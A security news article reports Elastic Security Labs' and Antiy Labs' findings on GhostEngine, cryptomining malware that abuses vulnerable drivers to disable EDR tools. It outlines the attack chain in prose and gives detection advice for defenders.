A new strain of malware has emerged, specifically designed to target vulnerable drivers in order to terminate and evade endpoint detection and response (EDR) solutions. This malicious software is currently being utilized in an elaborate cryptomining campaign, shedding light on the increasingly sophisticated tactics employed by cybercriminals.
According to researchers at Elastic Security Labs, this malware, identified as GhostEngine, is part of an intrusion set named REF4578. The attackers behind this campaign have demonstrated a high level of complexity in their methods, using GhostEngine to disable EDR solutions, establish persistence, install a previously undocumented backdoor, and execute a cryptominer. The ultimate goal of this campaign is to breach security barriers within corporate networks and mine cryptocurrency without detection.
Simultaneously, the team at Antiy Labs has also observed these attacks, referring to the payload as “Hidden Shovel,” a mining Trojan that employs a two-stage approach to disable EDR solutions and install a backdoor. Both research teams have highlighted the use of the legitimate miner XMRig in these attacks, specifically for mining the cryptocurrency Monero.
The attack vector employed by GhostEngine involves the execution of a malicious PE file named Tiworker.exe, which masquerades as a legitimate Windows file. This file downloads and executes a PowerShell script that orchestrates the entire intrusion process, fetching attacker tools, GhostEngine modules, and configurations from a command-and-control server. Subsequently, GhostEngine downloads and executes its attack modules, which include tasks such as eliminating remnants of previous infections, disabling Windows Defender, and cleaning event log channels.
One of the most notable features of GhostEngine is its ability to terminate EDR processes, download and install a cryptominer, and establish a backdoor for remote command execution on infected systems. The malware is sophisticated, written in C++, and includes redundancy in its operation to avoid detection. Researchers were able to extract the configuration file from the XMRig miner, providing valuable insights into the mining operation conducted by the attackers.
To detect GhostEngine and similar malware, organizations are advised to prioritize monitoring for suspicious PowerShell executions, unusual directory executions, privilege escalations, and the deployment of vulnerable drivers. Detection opportunities diminish significantly once vulnerable drivers are loaded, making it essential for organizations to actively search for compromised endpoints.
Behavioral indicators associated with the campaign include suspicious PowerShell downloads, service control initiated via a script interpreter, creation of local scheduled tasks, and tampering with Windows Defender. By monitoring network traffic for DNS record lookups and identifying traffic to known mining pool domains over specific ports, organizations can enhance their detection capabilities.
Overall, the emergence of GhostEngine highlights the need for proactive measures to defend against sophisticated malware attacks. By remaining vigilant and implementing comprehensive cybersecurity measures, organizations can better protect their networks from increasingly advanced threats.